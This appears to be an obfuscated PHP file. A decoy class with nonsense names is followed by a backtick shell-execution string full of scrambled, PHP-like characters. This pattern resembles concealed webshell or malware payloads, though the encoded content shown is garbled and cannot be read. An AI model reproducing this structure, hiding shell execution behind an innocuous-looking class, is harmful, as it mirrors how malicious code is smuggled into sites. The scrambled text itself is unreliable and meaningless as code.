<?php

class	Fox	{
				public	$aci	=	'deu';
	function	qyl()	{
				return	'sho';
}
}

$sigr	=`unhy<
$dij	q#"@i[cxddr%:
lfl]aqtg'gqzt5,;xsr*)"=
jes]erpg'sohn;,<wirv)&!<

mbg^emyz#$bql?->Zel"@
rcs^bhhh*$ajl?->fcm"@
zbw[fmpq'$ehv?->ugm'"#=
gtk	{
				sdoƒfqoq'$cuw?->iwqk)(*>


mbg^emyz#$bql?->~	fbueg	&Kqwnjbcmc	$		ubq^anli!$b->mbjXfmnzwl*&kft	Dyz#:,<ecg%>pfo_cyxp#!zzzzzzzzzzzzzzzz
mbq_ejgt'"ufs	Byk">,;vhy*"'>
mim	{
				udv_ayzw"#vcp	Bvu%:.?wkik!"!=
}	efhdq	#Hrjs[fizw($d->bd*)"=
jes]erpg'sohn;,<wirv)